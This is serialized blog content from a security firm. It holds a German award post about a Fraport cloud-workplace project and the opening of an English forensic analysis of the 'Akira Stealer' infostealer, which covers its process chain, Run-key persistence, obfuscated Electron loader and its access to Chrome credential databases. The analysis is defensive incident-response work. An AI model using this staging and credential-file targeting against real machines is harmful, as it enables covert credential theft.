Flughafen: Microsoft 
Partner of the Year Awards 2025",[801],{"type":803,"value":6458,"toc":6529},[6459,6463,6465,6468,6471,6475,6477,6480,6483,6497,6500,6503,6507,6509,6512,6516,6518,6521],[810,6460,6462],{"id":6461},"vom-rollfeld-in-die-cloud","Vom Rollfeld in die Cloud",[806,6464,816],{},[806,6466,6467],{},"Fraport betreibt 29 Flughäfen weltweit, darunter den Flughafen Frankfurt – einen der größten Verkehrsknotenpunkte Europas. Mehr als 80.000 Mitarbeitende halten dort täglich den Betrieb am Laufen: von der Gepäckabfertigung bis zur IT-Sicherheit. Damit diese Abläufe funktionieren, braucht es eine verlässliche, skalierbare und sichere digitale Infrastruktur.",[806,6469,6470],{},"Genau hier setzte das gemeinsame Projekt von Fraport und glueckkanja an: Die bestehende VDI-Umgebung sollte durch eine moderne, cloudbasierte Arbeitsplatzarchitektur ersetzt werden. Das Ziel: mehr Flexibilität, weniger Komplexität, und eine Plattform, die auf die Anforderungen einer global vernetzten Organisation zugeschnitten ist.",[810,6472,6474],{"id":6473},"cloud-managed-workplace","Cloud Managed Workplace",[806,6476,816],{},[806,6478,6479],{},"Im Zentrum steht die Kombination aus Windows 365 Cloud PCs und der Microsoft Intune Suite. 
Mehr als 16.500 Endpoints werden heute zentral bereitgestellt, verwaltet und abgesichert.",[806,6481,6482],{},"Das Ergebnis:",[2738,6484,6485,6488,6491,6494],{},[2741,6486,6487],{},"Gerätebereitstellung in Minuten statt Stunden",[2741,6489,6490],{},"Automatisierte Prozesse für mehr Effizienz",[2741,6492,6493],{},"Transparente Verwaltung und Monitoring",[2741,6495,6496],{},"Zero-Trust-Sicherheitsmodell über alle Geräte hinweg",[806,6498,6499],{},"So entsteht ein Arbeitsplatzkonzept, das Fraports Mitarbeitenden sichere und flexible Arbeit über alle Standorte, Endgeräte und Rollen hinweg ermöglicht.",[1432,6501],{":quotes":6502,":no-fullscreen":1435,"spacing":1436},"quoteMicrosoft",[810,6504,6506],{"id":6505},"anerkennung-für-innovation-und-zusammenarbeit","Anerkennung für Innovation und Zusammenarbeit",[806,6508,816],{},[806,6510,6511],{},"Mit den Microsoft Partner of the Year Awards zeichnet Microsoft jedes Jahr Partnerunternehmen aus, die herausragende Cloud-Lösungen, Services und Innovationen entwickeln und umsetzen. In einem globalen Wettbewerb aus mehr als 4.600 Einreichungen wurde glueckkanja für die erfolgreiche Umsetzung des Fraport-Projekts hervorgehoben, ein starkes Zeichen für die Relevanz cloudbasierter Arbeitsplatzlösungen in kritischen Infrastrukturen.",[810,6513,6515],{"id":6514},"ein-blueprint-für-moderne-arbeitsplatzarchitektur","Ein Blueprint für moderne Arbeitsplatzarchitektur",[806,6517,816],{},[806,6519,6520],{},"Das Projekt zeigt, wie sich komplexe Infrastrukturen mit der Cloud neu denken lassen, ohne dabei Kompromisse bei Sicherheit oder Benutzerfreundlichkeit einzugehen. Für Fraport war es der Schritt zu einem standardisierten, cloudbasierten Arbeitsplatzmodell. 
Für glueckkanja ist es ein Beispiel dafür, wie sich moderne IT-Strategien nachhaltig skalieren lassen.",[806,6522,6523,6524,2786],{},"Die vollständige Liste aller ausgezeichneten Projekte findet sich ",[833,6525,6528],{"href":6526,"rel":6527},"https://aka.ms/2025POTYAWinnersFinalists",[1410],"hier",{"title":863,"searchDepth":864,"depth":864,"links":6530},[6531,6532,6533,6534],{"id":6461,"depth":864,"text":6462},{"id":6473,"depth":864,"text":6474},{"id":6505,"depth":864,"text":6506},{"id":6514,"depth":864,"text":6515},{"seoTitle":6536,"titleClass":873,"date":6537,"categories":6538,"blogtitlepic":6539,"socialimg":6540,"customExcerpt":6541,"keywords":6542,"contactInContent":6543,"hreflang":6570,"scripts":6575,"quoteMicrosoft":6576},"Cloud-first am Flughafen: Ausgezeichnet bei den Microsoft Partner of the Year Awards 2025","2025-11-12",[876],"head-partner-of-the-year-2025","/heads/head-partner-of-the-year-2025.jpg","Mehr als 4.600 Nominierungen aus über 100 Ländern und mittendrin ein Projekt, das zeigt, wie moderne IT aussehen kann: Gemeinsam mit Fraport wurde glueckkanja bei den Microsoft Partner of the Year Awards 2025 in der Kategorie Cloud Endpoints ausgezeichnet.","Microsoft Partner of the Year Awards 2025, Cloud Endpoints Award, glueckkanja Fraport, Fraport Microsoft Fallstudie, Windows 365 Cloud PC, Microsoft Intune Suite, Cloud Managed Workplace, Azure Cloud Migration, Zero Trust Sicherheit, Modern Workplace, Cloud-first Strategie, Digitale Arbeitsplatztransformation, Endpoint Management, Automatisierte Gerätebereitstellung, Sichere Cloud-Infrastruktur, Skalierbare IT-Architektur, Cloud Governance und Compliance, Enterprise Mobility und Security, IT-Infrastruktur im Flughafen, Digitale Transformation in der Luftfahrt, IT für kritische Infrastrukturen, Globale IT-Operationen, Remote Work Enablement, IT-Modernisierung im Transportwesen, Cloud-basierter Arbeitsplatz für kritische Infrastrukturen, Microsoft Windows 365 und Intune in Unternehmen, Sichere und 
skalierbare Endpoint-Verwaltung, Transformation von Flughafen-IT mit Azure",{"quote":508,"infos":6544},{"bgColor":883,"color":884,"boxBgColor":761,"boxColor":884,"headline":6545,"subline":6546,"level":810,"textStyling":887,"flush":888,"person":6547,"form":6554},"Jetzt Kontakt aufnehmen","Ihr möchtet mehr über das Projekt und unsere Auszeichnung erfahren? Wir zeigen euch gerne, wie der Weg zur standardisierten Cloud-Architektur bei Fraport umgesetzt wurde.",{"image":6548,"cloudinary":508,"alt":1112,"name":1112,"quotee":1112,"quoteeTitle":6549,"quote":6550,"detailsHeader":895,"details":6551},"/people/people-christian-kanja.jpg","CEO","Das Projekt mit Fraport zeigt, wie sich durch Standardisierung und Automatisierung ein sicheres, skalierbares Arbeitsplatzmodell umsetzen lässt. Genau das braucht es, um IT-Umgebungen langfristig stabil zu betreiben und weiterzuentwickeln.",[6552,6553],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":905,"cta":6555,"method":870,"action":908,"fields":6556},{"skin":907},[6557,6558,6559,6560,6561,6562,6563,6564,6565,6567,6568,6569],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":918},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":921},{"label":923,"type":924,"id":924,"required":508,"requiredMsg":925},{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":932,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":371},{"type":911,"id":939,"value":940},{"type":911,"id":942,"value":6566},"Form: Blog Microsoft Security Store | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"type":911,"id":950},[6571,6573],{"lang":953,"href":6572},"/en/posts/2025-11-12-partner-of-the-year-awards",{"lang":956,"href":6574},"/es/posts/2025-11-12-partner-of-the-year-awards",{"slick":508,"form":508},{"items":6577},[6578],{"text":6579,"name":6580,"company":6581,"alt":6580},"Durch den Wechsel zu 
Windows 365 Cloud PCs und zur Intune Suite haben wir ein neues Maß an Agilität und Sicherheit erreicht. Die Zusammenarbeit mit glueckkanja hat die Basis für zukünftige Innovationen gelegt.","Niklas Rast","Senior Solution Architect bei Fraport","/posts/2025-11-12-partner-of-the-year-awards",{"title":6455,"description":863},"posts/2025-11-12-partner-of-the-year-awards",[963,6586],"Partner of the Year","ZDJ1X4t39o2Sb_Bl-DmPog5FAKD_8eS-1svkEoSTjEo",{"id":6589,"title":6590,"author":6591,"body":6592,"cta":764,"description":816,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":18940,"moment":18942,"navigation":508,"path":19037,"seo":19038,"stem":19039,"tags":19040,"webcast":749,"__hash__":19043},"content_de/posts/2025-06-16-quiet-breach.md","Inside Akira Stealer: A full technical analysis of a modular stealer",[1231],{"type":803,"value":6593,"toc":18795},[6594,6598,6600,6607,6610,6627,6630,6647,6653,6656,6659,6680,6688,6699,6706,6709,6712,6727,6734,6737,6740,6752,6756,6758,6764,6768,6770,6773,6785,6794,6800,6803,6809,6812,6816,6818,6823,6829,6832,6836,6838,6841,6867,6872,6877,6881,6883,6886,6890,6892,6895,6897,6903,6906,6910,6912,6922,6925,6928,6948,6951,6958,6965,6967,6973,6976,6982,6985,7019,7022,7031,7037,7046,7049,7060,7063,7070,7072,7081,7091,7123,7129,7134,7155,7161,7164,7167,7173,7181,7188,7190,7193,7205,7208,7241,7247,7274,7283,7286,7291,7300,7302,7311,7317,7334,7337,7342,7376,7380,7383,7386,7392,7406,7412,7418,7420,7425,7429,7431,7505,7508,7512,7514,7519,7525,7530,7539,7544,7549,7560,7563,7568,7577,7583,7586,7590,7592,7603,7608,7627,7633,7642,7653,7660,7665,7669,7671,7677,7703,7706,7717,7720,7729,7732,7736,7738,7746,7749,7752,7765,7775,7782,7803,7806,7812,7816,7818,7821,7830,7842,7867,7873,7879,7882,7889,7892,7905,7912,7914,7921,7925,7927,7933,8031,8038,8045,8047,8050,8073,8076,8103,8106,8148,8151,8160,8163,8180,8186,8189,8198,8201,8215,8222,8226,8228,8235,8258,8265,8299,8302,8317,8324,8329,8340,8343,8347,8349,8352,8367,8374,8385,8396,8431,8438,
8441,8445,8447,8453,8458,8498,8501,8516,8519,8528,8534,8537,8541,8543,8546,8555,8558,8605,8612,8616,8618,8624,8629,8658,8665,8667,8683,8687,8689,8692,8731,8737,8743,8747,8749,8768,8778,8785,8817,8824,8870,8878,8882,8884,8887,8915,8925,8932,8934,8939,8943,8945,8951,8955,8957,8964,8990,8997,9252,9255,9260,9263,9295,9300,9304,9306,9309,9313,9315,9318,9420,9423,9427,9429,9432,9594,9597,9620,9624,9626,9635,9876,9879,9908,9912,9914,9947,9950,9953,9984,9988,9990,9996,10001,10004,10021,10024,10032,10037,10040,10119,10127,10130,10136,10144,10148,10150,10156,10161,10164,10181,10188,10193,10200,10262,10275,10280,10286,10313,10316,10354,10357,10362,10365,10379,10383,10385,10390,10410,10417,10423,10425,10429,10431,10437,10441,10443,10447,10449,10454,10481,10487,10491,10493,10499,10516,10542,10549,10553,10555,10558,10567,10581,10584,10588,10590,10603,10606,10615,10620,10627,10629,10633,10635,10644,10648,10650,10655,10669,10684,10688,10690,10771,10774,10781,10783,10788,10846,10853,10979,10982,11127,11131,11133,11136,11190,11193,11197,11199,11206,11259,11262,11266,11268,11271,11323,11326,11330,11332,11339,11391,11394,11398,11400,11407,11448,11451,11455,11457,11464,11546,11549,11553,11555,11558,11605,11608,11613,11616,11619,11623,11625,11630,11636,11641,11647,11652,11658,11663,11669,11674,12075,12079,12081,12122,12126,12128,12136,12140,12142,12152,12157,12182,12203,12208,12295,12299,12301,12394,12397,12403,12410,12412,12415,12470,12525,12532,12534,12537,12572,12607,12614,12616,12619,12652,12687,12694,12696,12699,12768,12814,12821,12823,12826,12854,12884,12891,12893,12896,12924,12947,12957,12959,12962,12987,13025,13029,13031,13064,13068,13070,13073,13076,13079,13082,13085,13090,13115,13120,13150,13156,13165,13187,13396,13400,13402,13409,13507,13510,13514,13516,13523,13616,13626,13632,13635,13640,13646,13674,13679,13709,13762,13781,13784,13789,13838,13842,13844,13847,13851,13853,13859,13979,13998,14002,14004,14009,14083,14104,14108,14110,14113,14116,14119,14122,14221,14229,14233,14235
,14240,14275,14296,14300,14302,14305,14308,14316,14319,14407,14421,14425,14427,14430,14433,14526,14532,14534,14540,14544,14546,14549,14614,14631,14634,14668,14671,14675,14677,14682,14695,14740,14766,14771,14783,14859,14914,14918,14920,14923,14929,14969,14979,14985,14995,14999,15001,15004,15033,15059,15065,15069,15071,15078,15085,15087,15093,15148,15176,15180,15182,15185,15250,15257,15296,15300,15302,15308,15323,15326,15361,15365,15367,15374,15418,15432,15438,15445,15447,15450,15454,15456,15459,15493,15496,15521,15525,15527,15532,15535,15559,15583,15587,15589,15592,15616,15620,15622,15625,15645,15649,15651,15654,15661,15774,15779,15824,15828,15830,15836,15870,15924,15929,15932,15936,15938,15941,15945,15947,15950,15956,15960,15962,15965,16020,16035,16039,16041,16052,16121,16130,16135,16138,16182,16184,16188,16190,16193,16283,16288,16417,16421,16423,16426,16431,16504,16522,16527,16547,16555,16560,16566,16581,16598,16604,16662,16680,16685,16702,16707,16751,16765,16768,16772,16774,16779,16783,16785,16792,16799,16803,16805,16916,16923,16927,16929,16935,16940,17020,17027,17034,17038,17040,17043,17072,17079,17083,17085,17089,17091,17098,17101,17104,17107,17250,17253,17257,17259,17262,17266,17268,17271,17306,17312,17316,17318,17321,17347,17350,17356,17360,17362,17367,17384,17390,17394,17396,17400,17402,17418,17442,17449,17465,17484,17487,17491,17493,17504,17508,17510,17944,17947,17951,17953,17959,17962,17965,17971,17974,17985,17991,17994,17999,18003,18005,18008,18013,18027,18031,18033,18330,18333,18337,18339,18451,18454,18458,18460,18514,18517,18521,18523,18686,18689,18693,18695,18736,18739,18743,18745,18748,18751,18754,18757,18760,18763,18768,18772,18774,18777,18780,18783,18786,18789,18792],[1511,6595,6597],{"id":6596},"prologue","Prologue",[806,6599,816],{},[806,6601,6602,6603,6606],{},"It started like so many modern attacks do: quietly. 
A low-confidence Defender alert — ",[1736,6604,6605],{},"\"Suspicious sequence of exploration activities\""," — surfaced during the onboarding phase of a new customer into our glueckkanja Cyber Security Operations Center (CSOC).",[806,6608,6609],{},"There were no signature hits. No malware classifications. No real-time protection response. Just a single behavioral correlation in Microsoft 365 Defender, buried in the noise — and yet, unmistakably wrong.",[806,6611,6612,6613,6616,6617,5611,6620,6623,6624],{},"While triaging the alert, one specific action caught my attention: ",[1524,6614,6615],{},"python.exe"," had accessed both the ",[1524,6618,6619],{},"Login Data",[1524,6621,6622],{},"Web Data"," files inside a Chromium profile. Microsoft Defender immediately escalated this to a high-severity incident — ",[1736,6625,6626],{},"\"Possible theft of passwords and other sensitive web browser information.\"",[806,6628,6629],{},"This wasn’t a false positive. It was the tip of something deeper.",[806,6631,6632,6633,6636,6637,6640,6641,6644,6645,2786],{},"Tracing the telemetry backwards, I uncovered a generically named binary launched at user logon — ",[1524,6634,6635],{},"Updater.exe"," — which spawned a NodeJS-based wrapper (",[1524,6638,6639],{},"main.exe",") that executed a command line to run a script named ",[1524,6642,6643],{},"astor.py"," via ",[1524,6646,6615],{},[1545,6648,6651],{"className":6649,"code":6650,"language":916,"meta":863},[1548],"Updater.exe → main.exe → cmd.exe → python.exe Crypto\\Util\\astor.py\n",[1524,6652,6650],{"__ignoreMap":863},[806,6654,6655],{},"The script didn’t just scrape credentials — it executed a sequence of post-compromise reconnaissance steps, including registry queries, system fingerprinting, and privilege-aware enumeration. It operated with surgical precision, mimicking native system behavior to evade detection. 
And it worked — almost.",[806,6657,6658],{},"At the time of first response:",[2738,6660,6661,6670,6677],{},[2741,6662,6663,6665,6666,6669],{},[1524,6664,6635],{}," was flagged by only ",[1736,6667,6668],{},"1 out of 69"," engines on VirusTotal.",[2741,6671,6672,2289,6674,6676],{},[1524,6673,6639],{},[1524,6675,6643],{},", and all associated components were essentially undetected on VirusTotal.",[2741,6678,6679],{},"No files were signed. No elevated context. Just \"ordinary\" processes doing very non-ordinary things.",[806,6681,6682,6684,6685,6687],{},[1524,6683,6635],{}," didn’t touch credentials. That task was reserved for ",[1524,6686,6643],{},", the in-memory Python payload — a file that, by design, left almost no trace.",[806,6689,6690,6691,6694,6695,6698],{},"Within ",[1736,6692,6693],{},"21 minutes",", the affected system was isolated from the network. Within ",[1736,6696,6697],{},"70 minutes",", credentials were rotated across all affected scopes: internal identities, SaaS platforms, third-party services. (Stolen session cookies and tokens are not invalidated by a password change alone and have to be revoked separately.)",[806,6700,6701,6702,6705],{},"But the real turning point came when we extracted and fully decrypted the Python payload. What we found was not a generic stealer — it was a custom deployment of ",[1736,6703,6704],{},"Akira Stealer v2",", a commercially distributed malware family sold via Telegram.",[806,6707,6708],{},"Thanks to our in-house threat intelligence and reverse engineering capabilities, we were able to reconstruct the full functionality of the malware, extract all embedded indicators, and understand its staging, exfiltration, and credential targeting logic in detail.",[806,6710,6711],{},"More importantly — we didn’t stop at technical attribution. 
We went further.",[806,6713,6714,6715,6718,6719,6722,6723,6726],{},"We were able to provide the client with a ",[1736,6716,6717],{},"complete dataset of exfiltrated credentials",": over ",[1736,6720,6721],{},"100 unique username-password combinations",", including access credentials to cloud services, CRM systems, internal platforms, and even personal tools used by key employees. The theft had been ongoing for ",[1736,6724,6725],{},"months"," — and we could account for all of it.",[806,6728,6729,6730,6733],{},"Using insights gained from this case, we built a ",[1736,6731,6732],{},"post-infection analysis tool"," that scans affected systems, reconstructs credential access patterns, and generates detailed forensic reports — mapping exactly what was stolen, when, and from where.",[806,6735,6736],{},"We’ll share a glimpse of that scanner at the end of this report.",[806,6738,6739],{},"Because this is more than just an incident.\nThis is how we investigate. This is how we protect.",[806,6741,6742,6749,6751],{},[1736,6743,6744,6745,2786],{},"Welcome to the ",[833,6746,6748],{"href":6747},"/en/security/cloud-security-operations-center/","glueckkanja CSOC",[2016,6750],{},"\nThis is how we work — because breaches don't wait.",[1511,6753,6755],{"id":6754},"_1-initial-event-and-triage-summary","1. Initial Event and Triage Summary",[806,6757,816],{},[806,6759,6760,6761,6763],{},"On March 31, 2025, Microsoft Defender for Endpoint generated an alert labeled ",[1736,6762,6605],{}," on a Windows 10 64-bit endpoint. I began the triage based on this signal and reviewed the affected system using the process tree, system timeline, and evidence correlated by Defender.",[810,6765,6767],{"id":6766},"_11-timeline-based-triage","1.1 Timeline-Based Triage",[806,6769,1536],{},[806,6771,6772],{},"The alert pointed to a sequence of processes that warranted further inspection. 
During initial review, I observed the following access patterns to Chrome browser data within the local user profile:",[2738,6774,6775,6780],{},[2741,6776,6777],{},[1524,6778,6779],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",[2741,6781,6782],{},[1524,6783,6784],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data",[806,6786,6787,6788,6790,6791,6793],{},"These accesses were performed by the process chain rooted in a binary named ",[1524,6789,6635],{},". While Microsoft Defender had not flagged the binary based on heuristic or behavioral analysis, I found a detection for ",[1524,6792,6635],{}," on VirusTotal — flagged by a single engine at that point in time.",[806,6795,6796],{},[1449,6797],{"alt":6798,"src":6799},"Microsoft Defender","https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png",[806,6801,6802],{},"The full observed execution chain was as follows:",[1545,6804,6807],{"className":6805,"code":6806,"language":916,"meta":863},[1548],"winlogon.exe\n└── userinit.exe\n    └── explorer.exe\n        └── Updater.exe\n            └── main.exe\n                └── cmd.exe /d /s /c \"python.exe Crypto\\Util\\astor.py\"\n                    └── python.exe Crypto\\Util\\astor.py\n",[1524,6808,6806],{"__ignoreMap":863},[806,6810,6811],{},"At this stage, no deeper static or dynamic analysis of the involved files had been performed. My focus was on understanding the high-level behavior and context. The process names and file paths were generic, and no suspicious command-line arguments were present beyond the chained Python execution.",[810,6813,6815],{"id":6814},"_12-initial-response","1.2 Initial Response",[806,6817,1536],{},[806,6819,6690,6820,6822],{},[1736,6821,6693],{}," of the initial alert, I initiated host isolation using Defender for Endpoint’s isolation features. 
The goal was to prevent potential further spread or exfiltration.",[806,6824,6825,6826,6828],{},"Within the first ",[1736,6827,6697],{},", we proceeded to rotate credentials that were known to be used on the affected host — covering internal systems, SaaS platforms, and critical third-party vendors.",[806,6830,6831],{},"The reverse engineering process began after the first containment. The following sections document the technical deep dive that followed to investigate the breach.",[810,6833,6835],{"id":6834},"_13-response-summary-fast-transparent-impact-driven","1.3 Response Summary – Fast, Transparent, Impact-Driven",[806,6837,1536],{},[806,6839,6840],{},"Our response combined speed, expertise, and operational excellence—backed by proven workflows and full visibility for the customer.",[2738,6842,6843,6849,6855,6861],{},[2741,6844,6845,6848],{},[1736,6846,6847],{},"Detection to full containment in under 90 minutes","\nDefender alerts, network isolation, antivirus scan, and credential revocation executed rapidly and in concert.",[2741,6850,6851,6854],{},[1736,6852,6853],{},"Deep-dive forensic response within 48 hours","\nIncluding full disk and memory analysis, browser artifact review, credential dumping detection, and behavioral reconstruction of attacker activity.",[2741,6856,6857,6860],{},[1736,6858,6859],{},"Secure data recovery & evidence handling","\nThe stolen data—including cookies, passwords, tokens, and browser profiles—was recovered, forensically archived, and handed off securely to the customer.",[2741,6862,6863,6866],{},[1736,6864,6865],{},"End-to-end visibility and communication","\nEvery step—from first alert to remediation and debrief—was fully documented, shared in real time, and summarized in a structured CSIRT handover.",[3587,6868,6869],{},[806,6870,6871],{},"This incident showcases how glueckkanja CSOC doesn’t just stop malware—we dismantle its effects, restore control to our customers, and turn every incident into 
insight.",[1541,6873],{"className":6874},[6875,6876],"space-top-1","space-bottom-1",[1511,6878,6880],{"id":6879},"_2-malware-architecture-and-execution-chain-overview","2. Malware Architecture and Execution Chain Overview",[806,6882,816],{},[806,6884,6885],{},"The malware observed on the affected endpoint followed a structured, multi-stage architecture with clear separation of responsibilities: deployment, decoding, execution, and data exfiltration.",[810,6887,6889],{"id":6888},"_21-execution-chain-overview","2.1 Execution Chain Overview",[806,6891,1536],{},[806,6893,6894],{},"The observed execution flow was as follows:",[806,6896,6635],{},[1545,6898,6901],{"className":6899,"code":6900,"language":916},[1548],"​   └── main.exe\n​       └── cmd.exe\n​           └── python.exe astor.py\n",[1524,6902,6900],{"__ignoreMap":863},[806,6904,6905],{},"Each component in the chain contributed to stealth, modularity, and evasion. The architecture leveraged legitimate runtimes and standard OS interpreters to bypass detection mechanisms.",[1671,6907,6909],{"id":6908},"_211-origin-uncertainty-missing-initial-vector","2.1.1 Origin Uncertainty: Missing Initial Vector",[806,6911,1677],{},[806,6913,6914,6915,6918,6919,2786],{},"Despite extensive analysis of the post-compromise environment, the initial access vector could not be conclusively determined. This uncertainty stems primarily from the fact that the malware had remained active for an estimated ",[1736,6916,6917],{},"six months prior to detection"," — exceeding the ",[1736,6920,6921],{},"log retention period enforced by Microsoft Defender for Endpoint",[806,6923,6924],{},"As a result, no telemetry or forensic artifacts were available from the original time of infection. 
No initial process creation events, file drops, or command-line entries related to the delivery stage were recoverable from Defender’s timeline or associated sensors.",[806,6926,6927],{},"Based on contextual indicators and OSINT sources, a likely infection vector may have involved:",[2738,6929,6930,6936,6942],{},[2741,6931,6932,6935],{},[1736,6933,6934],{},"Trojanized installers"," of cracked or modded gaming software",[2741,6937,6938,6941],{},[1736,6939,6940],{},"Fake utilities"," or \"performance boosters\" distributed via forums and third-party sites",[2741,6943,6944,6947],{},[1736,6945,6946],{},"Malicious browser extensions"," targeting specific user interests (e.g., crypto-related tools or Discord enhancements)",[806,6949,6950],{},"However, these remain speculative.",[806,6952,6953,6954,6957],{},"No confirmed dropper, phishing email, or compromised website could be identified during the investigation. While the malware architecture and execution chain were fully reconstructed, the ",[1736,6955,6956],{},"initial point of compromise (MITRE ATT&CK T1190 / T1566)"," could not be validated.",[1671,6959,6961,6962,6964],{"id":6960},"_212-updaterexe-initial-loader","2.1.2 ",[1524,6963,6635],{}," – Initial Loader",[806,6966,1677],{},[806,6968,6969,6970,6972],{},"When reviewing the process tree in Microsoft 365 Defender, ",[1524,6971,6635],{}," stood out immediately — not because of what it did, but because of how silently it embedded itself into the system’s execution flow.",[806,6974,6975],{},"This binary was registered for automatic execution via the standard Windows Run key:",[1545,6977,6980],{"className":6978,"code":6979,"language":916},[1548],"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",[1524,6981,6979],{"__ignoreMap":863},[806,6983,6984],{},"That meant it would launch every time the user logged into their session — a classic persistence mechanism that requires no elevated privileges and often slips through unnoticed in EDR 
telemetry.",[2738,6986,6987,6993,6999,7005,7011],{},[2741,6988,6989,6992],{},[1736,6990,6991],{},"File Type",": Windows PE executable (32-bit)",[2741,6994,6995,6998],{},[1736,6996,6997],{},"Signature",": Unsigned",[2741,7000,7001,7004],{},[1736,7002,7003],{},"VirusTotal Detection",": 1 out of 69 engines at the time of triage",[2741,7006,7007,7010],{},[1736,7008,7009],{},"Execution Context",": Medium integrity, user session",[2741,7012,7013,2545,7016],{},[1736,7014,7015],{},"Location",[1524,7017,7018],{},"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",[806,7020,7021],{},"The file itself was small, cleanly compiled, and unremarkable from a static analysis standpoint. No suspicious strings, no encrypted sections, and no indicators of obfuscation or packing. It imported only a minimal set of standard Windows API functions and contained no embedded payload.",[806,7023,7024,7025,7027,7028,7030],{},"However, its behavior was more telling. Once launched, ",[1524,7026,6635],{}," extracted an Electron application from a bundled archive — a self-contained NodeJS runtime packaged using standard Electron tooling. This unpacked folder contained an executable named ",[1524,7029,6639],{},", which was subsequently launched as a child process.",[1545,7032,7035],{"className":7033,"code":7034,"language":916,"meta":863},[1548],"Updater.exe → main.exe\n",[1524,7036,7034],{"__ignoreMap":863},[806,7038,7039,7040,7042,7043,7045],{},"There were no network indicators at this stage, no process injection, and no anomaly in privileges or token elevation. The entire role of ",[1524,7041,6635],{}," appeared to be that of a loader — delivering a second-stage component (",[1524,7044,6639],{},") into the environment, likely with the goal of maintaining stealth and modularity.",[806,7047,7048],{},"This kind of architectural separation is common in modern commodity malware and stealer toolkits. 
The initial loader acts merely as a deployment stub, allowing the heavier logic — often obfuscated, interpreted, or dynamically generated — to be contained in later stages.",[806,7050,7051,7052,7054,7055,7057,7058,2786],{},"In this case, ",[1524,7053,6635],{}," served precisely that purpose: a quiet initial foothold designed to blend in, remain undetected, and pave the way for the execution of the actual stealer logic in ",[1524,7056,6639],{}," and eventually ",[1524,7059,6643],{},[806,7061,7062],{},"It didn’t touch the file system beyond its own directory and didn’t trigger any behavioral rules — and yet, it was the first domino in a long and carefully constructed attack chain.",[1671,7064,7066,7067,7069],{"id":7065},"_213-mainexe-obfuscated-nodejs-payload-container","2.1.3 ",[1524,7068,6639],{}," – Obfuscated NodeJS Payload Container",[806,7071,1677],{},[806,7073,7074,7075,7077,7078,7080],{},"Following the execution of ",[1524,7076,6635],{},", a second-stage binary named ",[1524,7079,6639],{}," was launched. This component presented itself as a standard Electron application — a runtime environment bundling Node.js and Chromium, often used for cross-platform desktop apps. Its innocuous nature is part of what makes it so dangerous in the wrong hands.",[806,7082,7083,7084,7086,7087,7090],{},"Upon inspection, ",[1524,7085,6639],{}," contained an internal archive named ",[1524,7088,7089],{},"app.asar"," — the standard packaging format for Electron-based applications. 
Unlike legitimate Electron apps, however, the contents of this archive were anything but ordinary.",[2738,7092,7093,7099,7105,7113],{},[2741,7094,7095,7098],{},[1736,7096,7097],{},"Platform",": Electron (Node.js + Chromium)",[2741,7100,7101,7104],{},[1736,7102,7103],{},"Architecture",": 64-bit Windows",[2741,7106,7107,7110,7111],{},[1736,7108,7109],{},"Content Structure",": Embedded JavaScript files within ",[1524,7112,7089],{},[2741,7114,7115,7118,7119,7122],{},[1736,7116,7117],{},"Obfuscation Level",": High — achieved through ",[1524,7120,7121],{},"js-confuser",", a commercially available obfuscation toolkit for JavaScript",[806,7124,7125,7126,7128],{},"Once decompiled and deobfuscated, the core logic of ",[1524,7127,6639],{}," became evident. Its purpose was not to present a GUI or execute any frontend logic — instead, it acted as a hidden execution orchestrator.",[806,7130,7131],{},[1736,7132,7133],{},"Observed Behavior:",[2738,7135,7136,7139,7146],{},[2741,7137,7138],{},"Decrypts and reconstructs a Base64-encoded PowerShell command stored within the JavaScript payload",[2741,7140,7141,7142,7145],{},"Spawns ",[1524,7143,7144],{},"cmd.exe"," to execute the PowerShell command inline",[2741,7147,7148,7149,7151,7152,2772],{},"The PowerShell command in turn invokes ",[1524,7150,6615],{},", passing in a script located under a seemingly benign directory structure (",[1524,7153,7154],{},"Crypto\\Util\\astor.py",[1545,7156,7159],{"className":7157,"code":7158,"language":916,"meta":863},[1548],"main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\\Util\\astor.py\n",[1524,7160,7158],{"__ignoreMap":863},[806,7162,7163],{},"This chaining allowed the attacker to shift execution contexts and evade straightforward detection. Because the payload was obfuscated and staged in-memory, traditional signature-based controls were ineffective.",[806,7165,7166],{},"The Electron framework provided an ideal cover — allowing execution of arbitrary JavaScript while avoiding scrutiny. 
JavaScript-based execution also introduced cross-platform compatibility, allowing for flexible deployment and easier integration of dynamic control logic.",[806,7168,7169,7170,7172],{},"What made ",[1524,7171,6639],{}," particularly dangerous was its ability to operate without dropping any additional files beyond what had already been staged. The stealer script was invoked directly from disk, but all staging and execution logic remained embedded within the Electron bundle.",[806,7174,7175,7176,7178,7179,2786],{},"In summary, ",[1524,7177,6639],{}," served as the obfuscated, multi-layered execution core — acting as the gatekeeper between initial persistence and the full activation of the Akira Stealer payload in ",[1524,7180,6643],{},[1671,7182,7184,7185,7187],{"id":7183},"_214-cmdexe-powershell-relay","2.1.4 ",[1524,7186,7144],{}," & PowerShell Relay",[806,7189,1677],{},[806,7191,7192],{},"This stage of the execution chain functioned as a relay — not for payload logic, but for obfuscation and indirection.",[806,7194,7195,7196,7198,7199,7201,7202,2786],{},"After ",[1524,7197,6639],{}," completed its role of unpacking and decoding the payload, it spawned a ",[1524,7200,7144],{}," process. This process did not contain any malicious logic itself, nor did it write or modify files. 
